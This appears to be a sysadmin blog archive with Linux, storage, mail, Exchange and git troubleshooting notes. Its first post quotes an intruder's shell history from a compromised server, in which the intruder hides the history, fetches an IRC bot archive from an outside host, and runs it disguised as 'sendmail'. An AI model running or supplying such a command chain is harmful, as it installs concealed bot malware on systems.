Category Archives: Uncategorized

HISTFAIL

  494  unset HISTIFLE
495  w
496  ps x
497  ls
498  rm -rf piata
499  wget www.f-dic.com/bot.tar ; tar xzvf bot.tar ; rm -rf bot.tar ; mv bot root-uscreens ; chmod 700 root-uscreens ; cd root-uscreens ; PATH=.:$PATH ; mv bash sendmail ; cp sendmail [sendmail] ; [sendmail]

a box got ssh left open on it. I like the ‘HISTIFLE’ part. irc bots? this feels so much 1995. bot.tar comes with pico though, just in case you can’t use vi!

automatic open-iscsi volume mounting on debian etch

This is a continuation of my work on getting open-iscsi working on etch and then getting dm_multipath working.

Note that I have the pass column in the fstab set to 0 so the system won’t fail to boot when fstab can’t find this partition early in the boot process; this is important.

I started off trying to use _netdev as a mount option. I verified in ‘/etc/init.d/mountall.sh’ that debian does use mount -a -O no_netdev to avoid mounting network devices before networking is up, but while watching the startup (vmware is great for this) I saw it was still trying to mount early in the boot process anyways, and the UUID wasn’t there yet, of course, since iscsi and networking weren’t there yet.

I took a look in the initrd (‘mkdir /tmp/initrd ; cd /tmp/initrd ; cat /boot/initrd.img-`uname -r` | cpio -idmv’) in search of where it reads the fstab to see if that was the same case and saw that ‘scripts/local-top/iscsi’ definitely was trying to get iscsi things done. It’s worth noting this may not have been there if I hadn’t recreated my initrd recently in my last post. I recalled seeing some notes about root on iscsi in ‘/usr/share/doc/open-iscsi/README.Debian’ (comes with the open-iscsi deb).

Someone I got an additional node that produced an error about failing to log in since it already existed. I stopped the open-iscsi init script and removed the corresponding folder in the /etc/iscsi/nodes/ tree, then restarted open-iscsi. It caught my eye that this script reported ‘Mounting network filesystems’ so I looked in the script and on line 102 saw ‘mount -a -O _netdev’ to mount lines tagged with the ‘_netdev’ option. On reviewing my fstab I saw I had two mounts, one commended out using /dev/dm-1 and the other not commented out using the UUID. The UUID mount was using ‘defaults’ while the devmapper mount was using ‘_netdev’. I switched the UUID mount to use the _netdev option, rebooted and saw my filesystem mounted. I ran ‘rm /etc/iscsi/iscsi.initramfs’ to rensure that my onboot initramfs work didn’t make a difference and it was confirmed.

The trick is simply to set your fstab up using the UUID (use ‘blkid’ to get it), options set to ‘_netdev’ and pass set to ‘0’:

UUID=8d070de0-403c-4669-9db0-5b17e3aeebc5 /mnt ext3 _netdev 0 0

Of course the ext3 partition won’t get fscked on startup, but that’s just the filesystem I was using for testing. The ultimate goal is to use GFS or OCFS or something to create an iscsi volume fronted by NFS on multiple servers.

So the open-iscsi init.d script actually does the mounting that finally works. This is mentioned in this group thread, although it’s worth noting that I set ‘node.startup = automatic’ and left ‘node.conn[0].startup = manual’ on each node. I don’t know what the difference is. In response to this later thread, I did not have to use an extra script.

dm_multipath and open-iscsi on debian etch

So I got open-iscsi working on debian, in so much that I had four disks, two to the ‘preferred controller’ were good but the two to the second controller weren’t. Switching the preferred controller

After installing multipath-tools I started looking at dmsetup but the target types listed in the man page: linear, striped and error, didn’t make sense. When I read the INTRO file included in the debian package I saw there were additional types snapshot and mirror. This thread clued me in to there being a multipath type.

Running ‘multipath -v 3 -ll’ provided some more information that made things click in my head. Running ‘blkid’ produced:

/dev/mapper/36001c23000d59fc600000284478bcdca1: UUID=”8d070de0-403c-4669-9db0-5b17e3aeebc5″ SEC_TYPE=”ext2″ TYPE=”ext3″
/dev/sda1: UUID=”742239f4-b6fe-4422-b1a2-5639e5ab4675″ SEC_TYPE=”ext2″ TYPE=”ext3″
/dev/sda5: TYPE=”swap”

The mapper device was created by running multipath and seemed to figure bits out on it’s own such that running just ‘multipath -ll’ would show the paths that were and were not working (thats a different problem).

sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sdb 8:16 [active][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 6:0:0:0 sdc 8:32 [active][faulty]
\_ round-robin 0 [prio=1][active]
\_ 4:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 5:0:0:0 sde 8:64 [active][ready]

For a while I was getting ‘mount: no such partition found’ when trying to mount by the UUID shown by ‘blkid’. It just stopped while I was researching the problem. The man page for mount indicates it needs access to /proc/partitions but I saw nothing related to UUID’s in there or elsewhere poking around /proc. I noticed there was a correct symlink in /dev/disk/by-uuid, so I rebooted the machine and checked again and it was gone. ‘iscsiadm -m session’ confirmed no sessions but ‘iscsiadm -m node’ had the nodes cached so I ran ‘iscsiadm -m node -L all’ to login again and verified the sessions again. I looked in /dev/disk/by-uuid and the uuid had shown up again. multipathd was running at startup so I figure it got things going again.

Interestingly, ‘multipath -ll’ only showed

sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:0 sde 8:64 [active][ready]

Changing the preferred path made the disks go down and the dm faulty:

root@file01:/mnt# multipath -ll
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48  [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64  [failed][faulty]

Running ‘multipath’ added the other two block devices again and I remounted ok.  This time the filesystem stayed happy when I changed the preferred path. I’m willing to suspect that you can only access a virtual disk via one controller at a time, although from either interface on that controller. That is, you can only access it on the second controller when the first one fails or you manually change the preferred path. The work is just getting everything set up so that it works on startup. What’s missing appears to be getting the iscsi login and then the multipath to include all disks, then your normal automount in fstab.

‘iscsiadm -m node -o show’ reports ‘node.startup = manual’ which is also set in /etc/iscsid.conf and /etc/iscsi/iscsid.conf. I ran ‘iscsiadm -m node -o update -n node.startup -v automatic’. Rebooting saw the login automatically firing.

Putting the UUID or /dev/dm-1 in the fstab wasn’t working. Watching the console it was obvious it was trying to mount the partition before the multipath stuff ran. Per ‘/usr/share/doc/multipath-tools-initramfs/README.Debian’ in the ‘multipath-tools-initramfs’ package I ran ‘update-initramfs -t -c -v -k `uname -r`’.

On reboot I saw “FATAL: Module dm_multipath not found.” While multipath may have been part of the problem, it seems like even with _netdev as a mount option the device is trying to be mounted before the open-iscsi daemon runs. I’ll leave that problem and post for another day; tomorrow if I’m lucky and nothing breaks.

pyzor: check failed: no response

~# spamassassin -D pyzor < ~abuse/Maildir/new/1211380929.V801Ic04fM701311.mx2
[12963] dbg: pyzor: network tests on, attempting Pyzor
[12963] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12963] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12963MwNYaWtmp
[12963] dbg: pyzor: [12964] finished: exit=0x0100
[12963] dbg: pyzor: check failed: no response
[12963] info: rules: meta test DIGEST_MULTIPLE has undefined dependency ‘DCC_CHECK’

The no response seemed bad. However:

# wget http://www200.pair.com/mecham/spam/sample-spam.txt
# spamassassin -D pyzor <sample-spam.txt
[12961] dbg: pyzor: network tests on, attempting Pyzor
[12961] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12961] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12961WKN9Tptmp
[12961] dbg: pyzor: got response: 82.94.255.100:24441 (200, ‘OK’) 82 0
[12961] dbg: pyzor: listed: COUNT=82/5 WHITELIST=0
[12961] info: rules: meta test DIGEST_MULTIPLE has undefined dependency ‘DCC_CHECK’

So actually I’m figuring Pyzor is working fine (this is with spamassassin installed via package on debian etch and use_pyzor 1 in local.cf). Got the idea from here.

iscsi on debian etch with open-iscsi and a dell md3000i initial notes

I had some problems using the debian open-iscsi package to connect to the md3000i on debian etch; both package versions 2.0.869.2-2 and 2.0.730-1etch1. A couple folks on the open-iscsi list pointed out there were problems with the kernel modules, so I compiled those from the open-iscsi source and diverted the debian modules. Details are here on the list.

Most open-iscsi documentation is in the README.

# iscsiadm -m discovery –type sendtargets –portal 10.0.9.10 -P 1
Target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a
Portal: 10.0.9.12:3260,2
Iface Name: default
Portal: 10.0.9.11:3260,1
Iface Name: default
Portal: 10.0.9.10:3260,1
Iface Name: default
Portal: 10.0.9.13:3260,2
Iface Name: default

The MD3000i has two controllers each with one out of band management port and two iscsi ports which can be seen above.  When logging in, it grabs all the disks mapped as seperate devices. I removed the ‘access’ mapping which is that odd 16/20mb partition. Notes about that are deep in here, and I remember Dell telling me it wasn’t really needed on the Windows server either.

# iscsiadm -m node -l
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]: successful

It logs in to each portal interface. I guess you use dm_multipath to hook them all back together, but I haven’t gotten that far.

 # cat /proc/partitions
major minor  #blocks  name

8     0    3145728 sda
8     1    2947896 sda1
8     2          1 sda2
8     5     192748 sda5
8    16  584888320 sdb
8    17  584886456 sdb1
8    32  584888320 sdc
8    33  584886456 sdc1
8    48  584888320 sdd
8    64  584888320 sde

sd[b-e] are the same disk, through each portal. You’ll notice it only shows a partition on two of the four, that’s the controller that is the “preferred path”. If we switch the preferred controller, the disks that are usable switch to the other pair. Again, I’m assumimg dm_multipath will clean that up.

netgear support fail

I’ve been trying to deal with a linux appliance’s memory problems for a while, here, and here. Because Netgear/Infrant’s build system removes binaries post-dpkg, it’s not really a full system and I sort of gave up debugging when I kept running into missing binaries (like strace). Some good people helped out (Thanks Mike Fedyk) but I went and opened a trouble ticket with netgear hoping to get to talk to an actual developer on the thing. They must exist somewhere, I can’t imagine netgear let them all go when they bought infrant or anything.

1) Netgear’s support site is terrible. There is not a ‘support.netgear.com, go to the knowledge base. Support is achieved through product registration of all places under online support submissions (6).

2) The Readynas people have a nice forum, and it’s product specific. There’s a blog and everything, which is cool. But my thread stopped getting responses from them last week. No “I don’t know” or anything, just stopped responding to me.

3) So I opened the ticket with Netgear, and they respond with:

The Hardware Compatibility List Memory list/page http://www.readynas.com/?page_id=83

It’s the only guideline we have and if it’s not on the list its not supported nor with the scope of support we provide.

You question is already in the best place for an answer. The moderators are will pass all applicable data to the engineering staff as needed.

Totally in response to like, my first post of the thread, somehow ignoring the rest of it. In a hurry, fine.

4) I reply saying there’s a problem with the product and I need escalation. Escalation closes my ticket and responds with:

The forum where are posting is run by our Engineering Team. For your reference, the members of our team use Star Wars (TM) type names. Considering the kind of issue that you are having, you will have to correspond with them, as we at NETGEAR Level 1 and Level 2 Support cannot assist you with this type of issue.

We appreciate your patience and understanding.

The implication that I still have patience at this point is nice of them, however totally wrong.

Outlook 2007 Crash, junk mail filters / imf?

This is a fun one, by fun I mean I just got to spend 6 hours on it sans lunch.

Outlook 2007 crashing on startup on Vista.

Log Name: Application
Source: Application Error
Date: 5/14/2008 12:09:46 PM
Event ID: 1000
Task Category: (100)
Level: Error
Keywords: Classic
User: N/A
Computer: vistabob

Description:
Faulting application OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, faulting module OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, exception code 0xc0000005, fault offset 0x004a3d0a, process id 0x308, application start time 0x01c8b5f606eba5ae.
Event Xml:
<Event xmlns=”http://schemas.microsoft.com/win/2004/08/events/event”>
<System>
<Provider Name=”Application Error” />
<EventID Qualifiers=”0″>1000</EventID>
<Level>2</Level>
<Task>100</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=”2008-05-14T19:09:46.000Z” />
<EventRecordID>13251</EventRecordID>
<Channel>Application</Channel>
<Computer>vistabob</Computer>
<Security />
</System>
<EventData>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>c0000005</Data>
<Data>004a3d0a</Data>
<Data>308</Data>
<Data>01c8b5f606eba5ae</Data>
</EventData>
</Event>


Things I tried.

  • Scanpst on all pst files. Did see an error about the junk mail list being full.
  • remove some recent office update to the junk mail filter
  • restore to last system restore before a glob of overnight office updates
  • open up mailbox in another profile, works fine, emptied deleted items.
  • open up mailbox in a new profile on another computer with 2007/xp, crashes.
  • open up mailbox in owa works fine.
  • turned off junk mail filtering in owa, lists were empty, added an address to each list.
  • use the mapi editor to remove the junk mail rule on the inbox, inconsequential.

And the winner is! Opened up mailbox in outlook 2003.

Yup, then it worked fine in 2007. Great times.

more linux memory debugging

I downgraded to an earlier version of raidiator on friday and saw no improvement in the memory black hole over the weekend. The frustrating part is being unable to tell where it is going, rather than trying to fix the problem with a particular daemon that I may not have the customized source for. My earlier blog entry about this is here. There’s more data from today in the netgear forum thread.

I did find this LKML thread by Mike Fedyk who did most of the upgrades to the munin memory script for 2.6. I can see in the thread that he decided to use the Total-Free-everythingelse=AppsUsed calculation, and I don’t see any big light bulbs in that thread to help solve my problem. I see on the net that someone that used to idle in #swn on irc is connected to a Mike Fedyk, so I’ve emailed him asking for an introduction before I try to harass him directly with the problem. I’m going to assume this is his LJ with a post about performance tuning.

My munin-users thread can be found here, for the record. I’m going to look around for more utilities to track down memory usage, although the lkml thread makes me feel like that may not be happening. I posted in the netgear thread asking for a kernel upgrade but the best advice I’ve gotten there so far is “our perl may be broken. stop running munin” so I’m not sure anyone technical is listening.

Linux Memory Usage

I’ve been trying to debug some memory problems on a ReadyNAS 1100. It has munin-node running, and I see the ‘app’ memory slowly raise something like 50-100MB a day. What’s odd is that Munin reports that it’s using 230MB of ram for ‘apps’ while memstat only reports 118224k (118MB or so), making it difficult to track down where the memory is going.

‘free’ and ‘/proc/meminfo’ only report the amount of free memory, and the amount of memory in buffers and cache other other little kernel bits. There’s no clear value for memory used. Munin calculates the used memory by subtracting other bits from memory total. I can’t find a lot of information about meminfo beyond this sort of descriptive bits about what each value means. It seems to be that if the memory is allocated, but not to buffers or cache or other small things, we assume it’s used by applications but that doesn’t pan out with tools that I can find to tell me how much memory an application is using.

The description here of the difference between VSZ (virtual size) and RSS (resident set size) is useful for looking at ‘ps aux’ output, but there’s nothing there that is using a ton of memory and feels like it’s count is pretty close to that generated by ‘memstat’.

The smugmug discussion about swappiness is interesting, as that was originally my problem because running out of memory with vm.swappiness set to 0 got the OOM killer going buck wild.  This discussion has recently made it to the lkml.

I’ll probably post to the lkml if I don’t figure something out this afternoon, as I’ve been staring at a lot of numbers lately.

Vista says you need permission to perform this action

Man this is annoying. A file tree ended up with a .svn folder which contains files marked read-only. When copied with Vista all is fine until you try to delete the folder, when you’re told “you need permission to perform this action” with “try again” and “cancel” with options, trying again many times didn’t do as much as I would have hoped. Eventually we found the files with the read-only attributes. These files are stored on a samba server so I suppose I’ll see if I can get get samba or a cron script to strip those attributes. Removing the read only attribute allows you to delete the file, but I can’t find any way to enable the old XP style dialog that tells you it is marked read only but allows you to delete it anyways if you have permissions. UAC is off, by the way.

update:

Raidiator, the debian based distro that runs on infrant (i always say infarant) / netgear readynas products has ‘store dos attributes = 1’ in the global section of /etc/samba/smb.conf. This stores the read-only / hidden / archive / system attributes in an extended attribute called user.DOSATTRIB:

getfattr -d entries
# file: entries
user.DOSATTRIB=”0x21″

Normally this is off and newer versions of samba use ‘map read only’ to determine what read only should be set to, based on the user write bit (default) (yes), the effective permissions of the user (permissions), or ignoring permissions and only using ‘store dos attributes’ (no).

I put ‘store dos attributes = 0’ in the share definition to override the global (/etc/frontview/samba/Shares.conf in raidiator) and reloaded samba (/etc/init.d/samba reload) and then the files properties showed that the file was not read only any longer, thus working around the problem of Vista not letting me delete read-only files.

Exchange 2007 Public Folder Security Groups

Tried to add an Exchange 2007 Global Security Group to a tree of public folders today. Exchange wouldn’t see the group unless it was mail enabled, but trying to switch it to a distribution group would break the NTFS ACLs that use it. Changing the group to be a universal security group however allowed me to mail enable it under recipient configuration, distribution groups, new distribution group in the exchange management console (EMC).

Then in the exchange management shell (EMS) I ran:

get-publicfolder -identity "\publicfolder" -recurse |
add-publicfolderclientpermission -user "Some Kind of Managers" -accessright publishingeditor

It’s perplexing how pipes work in powershell. That ‘get-publicfolder -identity “\foo”‘ produces very little information while ‘get-publicfolder -identity “\foo” | format-list” produces extended information is confusing to say the least, coming from a DOS/UNIX background, made worse by the command being named FORMAT rather than GETMEMOREINFORMATION. Oh well. Note that in the past I’ve seen that add-publicfolderclientpermission breaks if the user has some degree of permissions already, and you have to run a get command into a pipe to a remove command to clean up first.

git commit email notification on debian etch

We use git with a single bare repository for our puppet configuration, and each systems administrator has a local git repository clone which they push back to the origin. I wanted to set up email notification on this main repository which lives on a debian etch server.

I found post-receive-email in the git gitweb repository and assumed that it was not included in the debian package because it has a copyright with no OSS license included. It pulls its configuration from the git config, which is repository specific and kind of neat, but I had to modify it to call ‘git-repo-config’ instead of ‘git config’ because that’s all etch had. Again, assuming some weird debian problem, but I didn’t bother looking.

Then when I had trouble with it not working I noticed my ubuntu hardy box had a newer major revision of git-core than the debian etch box. That is 1.5.4.3-1ubuntu2 and 1.4.4.4-2 respectively. I poked around the git documentation a little bit and found that the post-receive hooks weren’t added until 1.5.1. But there is a 1.5.4 git-core deb in etch-backports.

If you want to upgrade multiple boxes with a local repository, you’ll need a copy more than git-core to meet the dependences. otherwise you can just use apt-get install after adding the backports repo.

add ‘deb http://www.backports.org/debian etch-backports main’ to /etc/apt/sources.list

sudo apt-get update
sudo apt-get install debian-backports-keyring
sudo apt-get update
sudo apt-get install apt-move
sudo rm /var/cache/apt/archives/git*
for package in gitk gitweb `apt-cache search '^git-*' --names-only | awk '{ print $1 }'` ; do sudo /usr/lib/apt-move/fetch $package ; done

latest debs are in /var/cache/apt/archives, for copying to a local repository.

git-core 1.5.4.2-1~bpo40+2 includes git-config and ‘post-receive-email’.

cd /path-to-bare-git-repo/.git/hooks
ln -sf /usr/share/doc/git-core/contrib/hooks/post-receive-email post-receive
sudo chmod a+x /usr/share/doc/git-core/contrib/hooks/post-receive-email
git-config hooks.mailinglist "to@example.org"

git-config --global user.name "Your Name"
git-config --global user.email "Your Email"

tinkering with ruby, activeldap and active directory, part 2

These are my notes from tonights reading after trying to get activeldap working with active directory today at work. Here is when they renamed ActiveLDAP to ActiveLdap, around 0.8.0, so if you’re looking at examples using the capital case, they’re fairly old and really should probably ignore them. v0.8.0 and later is also when Base.connect went away and we got Base.establish_connection, and dnattr became dn_attribute. The most sane examples live in the rdoc in active_ldap.rb. Still not 100% there though.